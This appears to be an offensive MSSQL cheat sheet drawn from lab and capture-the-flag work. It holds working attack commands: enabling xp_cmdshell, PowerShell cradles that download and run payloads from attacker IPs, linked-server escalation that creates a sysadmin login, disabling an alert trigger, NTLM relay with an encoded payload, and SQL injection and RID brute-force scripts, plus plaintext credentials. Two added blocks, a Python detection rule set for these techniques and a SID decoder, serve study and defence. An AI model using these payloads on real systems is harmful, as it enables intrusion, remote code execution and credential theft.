SQLServerLinkedServersPasswords
Requirements:
- SQL Browser service running on the machine.
- The user executing the script must also have sysadmin access to all the database instances (for the DAC connection) and local admin privileges on the Windows server (to access the entropy bytes in the registry). In addition, if UAC is enabled, the script must be run as an administrator. Below is a summary of the process used by the script.
https://github.com/IamLeandrooooo/SQLServerLinkedServersPasswords/?tab=readme-ov-file
Upload all four files and execute them.
./EnableTCPIP.ps1
./EnableDAC.ps1
./AddStartUPParameter.ps1
./DecryptLinkedServersPassowrds.ps1
Reverse shell with login creds
mssqlclient.py external_user:#p00Public3xt3rnalUs3r#@10.13.38.11
Enabling xp_cmdshell
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell';
Getting a shell
EXEC xp_cmdshell 'powershell.exe -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadString(''http://10.8.2.41/amsi64.txt'') | IEX"'
EXECUTE AS LOGIN = 'sa';
EXEC sp_configure 'Show Advanced Options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'powershell.exe -ExecutionPolicy Bypass -Command "iwr -Uri ''http://10.10.14.32/amsi64.txt'' -UseBasicParsing | iex"';
REVERT;
MSSQL injection
Sleep
artist=1';WAITFOR%20DELAY%20'0:0:10'--
MSSQL Linked Servers
python3 mssqlclient.py webapp11:89543dfGDFGH4d@192.168.181.142
select srvname from master..sysservers
If the current user gets access denied for the following commands, also try the EXECUTE AS LOGIN = 'sa' approach from above.
select * from openquery("SQL27", 'SELECT is_srvrolemember(''sysadmin'')')
select is_rpc_out_enabled FROM sys.servers WHERE name ='SQL27'
EXEC('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [SQL27];
EXEC('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [SQL27];
EXEC('EXEC sp_configure ''show advanced options'', 0; RECONFIGURE;') AT [SQL27];
EXEC('EXEC xp_cmdshell ''echo IEX(New-Object Net.WebClient).DownloadString("http://192.168.45.195:80/large1.ps1") | powershell -noprofile'';') AT [SQL27];
nc -lvnp 1234
(New-Object System.Net.WebClient).DownloadString('http://192.168.45.195:80/am.txt') | IEX
Bounce back through the linked server to the original instance to get sa
EXEC ('EXEC (''select suser_name();'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
EXECUTE ('SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''SERVER'');') at [COMPATIBILITY\POO_CONFIG];
EXECUTE ('EXECUTE (''SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''''SERVER'''');'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
EXECUTE('EXECUTE(''CREATE LOGIN df WITH PASSWORD = ''''qwe123QWE!@#'''';'') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG];
EXECUTE('EXECUTE(''EXEC sp_addsrvrolemember ''''df'''', ''''sysadmin'''''') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
mssqlclient.py 'df:qwe123QWE!@#@10.13.38.11'
SELECT name FROM master..sysdatabases;
select table_name,table_schema from INFORMATION_SCHEMA.TABLES;
select * from flag.dbo.flag;
select name from sys.server_triggers;
disable trigger ALERT_xp_cmdshell on all server
enable_xp_cmdshell
EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("whoami");';
EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("type \inetpub\wwwroot\web.config");';
EXEC sp_execute_external_script @language = N'Python', @script = N'import os; os.system("ipconfig");';
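Added defender-side example, not from the notes above or from any tool they mention: rule-based detection over constructed statement-log lines (the `ts login= stmt=` format is assumed) that flags the sequences used in these notes: enabling xp_cmdshell, executing it, EXEC ... AT a linked server, disabling the ALERT_xp_cmdshell server trigger, sp_execute_external_script, and WAITFOR DELAY probes, and correlates enable-then-execute by the same login.

```python
import re

# Constructed sample statement log lines (e.g. from an Extended Events or SQL Audit
# export); hosts, logins and timestamps are made up for this example.
SAMPLE_LOG = [
    "2024-05-01T10:02:11 login=webapp11 stmt=SELECT srvname FROM master..sysservers",
    "2024-05-01T10:02:16 login=webapp11 stmt=EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;",
    "2024-05-01T10:02:20 login=webapp11 stmt=EXEC xp_cmdshell 'powershell.exe -ExecutionPolicy Bypass -Command ...'",
    "2024-05-01T10:03:01 login=webapp11 stmt=EXEC('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [SQL27];",
    "2024-05-01T10:03:30 login=sa stmt=DISABLE TRIGGER ALERT_xp_cmdshell ON ALL SERVER",
    "2024-05-01T10:04:00 login=webapp11 stmt=EXEC sp_execute_external_script @language=N'Python', @script=N'import os; os.system(\"whoami\")'",
    "2024-05-01T10:05:00 login=reporting stmt=SELECT name FROM sys.tables",
    "2024-05-01T10:06:00 login=sqlguest stmt=SELECT * FROM artists WHERE id='1';WAITFOR DELAY '0:0:10'--'",
]

# One rule per technique in the notes above; each is a (name, compiled regex) pair.
RULES = [
    ("xp_cmdshell_enable", re.compile(r"sp_configure\s+'+xp_cmdshell'+\s*,\s*1", re.I)),
    ("xp_cmdshell_exec", re.compile(r"\bxp_cmdshell\b\s+'", re.I)),
    ("linked_server_exec", re.compile(r"\bEXEC(?:UTE)?\s*\(.*\)\s*AT\s*\[", re.I)),
    ("ddl_trigger_disable", re.compile(r"\bDISABLE\s+TRIGGER\b.*\bON\s+ALL\s+SERVER\b", re.I)),
    ("external_script", re.compile(r"\bsp_execute_external_script\b", re.I)),
    ("time_based_probe", re.compile(r"\bWAITFOR\s+DELAY\b", re.I)),
]

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+login=(?P<login>\S+)\s+stmt=(?P<stmt>.*)$")

def classify(line):
    """Return an alert dict for one log line, or None if no rule matches."""
    m = LINE_RE.match(line)
    if not m:
        return None
    hits = [name for name, rx in RULES if rx.search(m.group("stmt"))]
    return {"ts": m.group("ts"), "login": m.group("login"), "hits": hits} if hits else None

def scan(lines):
    """All alerts for a log, in log order."""
    return [a for a in map(classify, lines) if a]

def shell_chain_logins(lines):
    """Logins that enabled xp_cmdshell and later executed it: the sequence in the notes above."""
    enabled, chained = set(), set()
    for a in scan(lines):
        if "xp_cmdshell_enable" in a["hits"]:
            enabled.add(a["login"])
        if "xp_cmdshell_exec" in a["hits"] and a["login"] in enabled:
            chained.add(a["login"])
    return sorted(chained)
```

The benign sysservers and sys.tables lines produce no alert; the enable on the linked server counts as both an enable and a linked-server execution.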
SQLRecon
UNC path injection
sqlrecon -- /e:sqlspns
$text ="(New-Object System.Net.WebClient).DownloadString('http://192.168.45.159:80/amsi64.txt') | IEX"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($text)
$EncodedText = [Convert]::ToBase64String($bytes)
$EncodedText
sudo proxychains ntlmrelayx.py --no-http-server -smb2support -t 172.16.240.151 -c 'powershell -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADEANQA5ADoAOAAwAC8AYQBtAHMAaQA2ADQALgB0AHgAdAAnACkAIAB8ACAASQBFAFgA'
sudo responder -I tun0
sqlrecon -- /a:wintoken /h:172.16.240.152 /m:smb /rhost:\\\\192.168.45.159\\\\Projects
MSSQL queries
select * from sys.dm_os_file_exists('\\10.8.2.41\Projects')
Enumerate users
manual way
SELECT DEFAULT_DOMAIN();
This returns the domain name.
SELECT SUSER_SID('REDELEGATE\Domain Admins')
Using the domain name and a group, we obtain the domain SID (as a binary value).
$BinarySID = "010500000000000515000000a185deefb22433798d8e847a00020000"
$SIDBytes = [byte[]]::new($BinarySID.Length / 2)
for ($i = 0; $i -lt $BinarySID.Length; $i += 2) {
    $SIDBytes[$i / 2] = [convert]::ToByte($BinarySID.Substring($i, 2), 16)
}
$SID = New-Object System.Security.Principal.SecurityIdentifier($SIDBytes, 0)
$SID.Value
Use the above PowerShell script to decode the domain SID.
#!/bin/bash
USERNAME="sqlguest"
PASSWORD="***"
SERVER="redelegate.vl"
SID_BASE="S-1-5-21-4024337825-2033394866-2055507597"
for SID in {1100..1200}; do
    QUERY="SELECT SUSER_SNAME(SID_BINARY(N'$SID_BASE-$SID'))"
    echo "$QUERY" > query.sql
    mssqlclient.py "$USERNAME:$PASSWORD@$SERVER" -file query.sql | grep -a REDELEGATE
    rm query.sql
done
Enumerate users based on the RID.
Automated way
nxc mssql 10.10.91.240 -u SQLGuest -p 'zDPBpaF4FywlqIv11vii' --local-auth --rid-brute 2000
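Added example, not part of the notes above or of the tools they use: a Python decoder for the varbinary SID that SUSER_SID returns (the same decoding the PowerShell snippet does), plus the inverse, which yields the same bytes as SID_BINARY in the RID loop, and a helper that labels the RID. The Domain Admins hex is the one from the notes; the well-known RID table is mine.

```python
import struct

# Hex of the varbinary SUSER_SID returned for the Domain Admins group in the notes above.
DOMAIN_ADMINS_SID_HEX = "010500000000000515000000a185deefb22433798d8e847a00020000"

# Well-known RIDs worth recognising when a resolved SID comes back (my table, not the page's).
WELL_KNOWN_RIDS = {500: "Administrator", 512: "Domain Admins", 513: "Domain Users", 519: "Enterprise Admins"}

def sid_bytes_to_string(raw):
    """Decode a binary SID: revision byte, sub-authority count byte, 48-bit big-endian
    identifier authority, then `count` 32-bit little-endian sub-authorities."""
    if len(raw) < 8:
        raise ValueError("SID too short")
    revision, count = raw[0], raw[1]
    if len(raw) != 8 + 4 * count:
        raise ValueError("length %d does not match %d sub-authorities" % (len(raw), count))
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack("<%dI" % count, raw[8:])
    return "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs))

def sid_string_to_bytes(sid):
    """Inverse of the above; same bytes as T-SQL SID_BINARY(N'S-1-5-...') in the loop above."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S":
        raise ValueError("malformed SID: %r" % sid)
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return bytes([revision, len(subs)]) + authority.to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)

def domain_sid(sid):
    """Drop the trailing RID: the Domain Admins SID minus its 512 is the domain SID used as SID_BASE."""
    return sid.rsplit("-", 1)[0]

def rid(sid):
    """Relative identifier (last sub-authority) of a SID."""
    return int(sid.rsplit("-", 1)[1])

def describe(raw_hex):
    """Decode a hex SID and return (sid, domain sid, label for its RID)."""
    sid = sid_bytes_to_string(bytes.fromhex(raw_hex))
    return sid, domain_sid(sid), WELL_KNOWN_RIDS.get(rid(sid), "RID %d" % rid(sid))
```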
CVEs
Authenticated
One significant security bulletin that addressed vulnerabilities in SQL Server 2008 R2, including SP1, is MS15-058. This bulletin described vulnerabilities that could allow remote code execution if an authenticated attacker ran a specially crafted query. The associated CVEs for this bulletin include:
CVE-2015-1761: Microsoft SQL Server Elevation of Privilege Vulnerability
CVE-2015-1762: Microsoft SQL Server Remote Code Execution Vulnerability
CVE-2015-1763: Microsoft SQL Server Elevation of Privilege Vulnerability
It is important to note that running SQL Server 2008 R2 SP1 without an ESU subscription leaves your system vulnerable to potential security threats, as newly discovered vulnerabilities will not be patched. Upgrading to a newer, supported version of SQL Server is highly recommended for improved security and access to the latest features.
1. CVE-2020-0618 - SQL Server Reporting Services RCE
Severity: Critical (CVSS 9.8)
Public Exploit: Yes (Metasploit module available)
Description: Remote code execution in SQL Server Reporting Services (SSRS)
# Metasploit
use exploit/windows/mssql/mssql_clr_payload
# or
use exploit/windows/http/ssrs_navcorrector_exec
-- See who you are
SELECT SYSTEM_USER;
SELECT USER_NAME();
SELECT SUSER_NAME();
-- Check your permissions
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
SELECT * FROM fn_my_permissions(NULL, 'DATABASE');
-- See what roles you're in (database roles, then server roles)
SELECT name FROM sys.database_principals WHERE type = 'R' AND IS_MEMBER(name) = 1;
SELECT name FROM sys.server_principals WHERE type = 'R' AND IS_SRVROLEMEMBER(name) = 1;
EXEC sp_helprotect;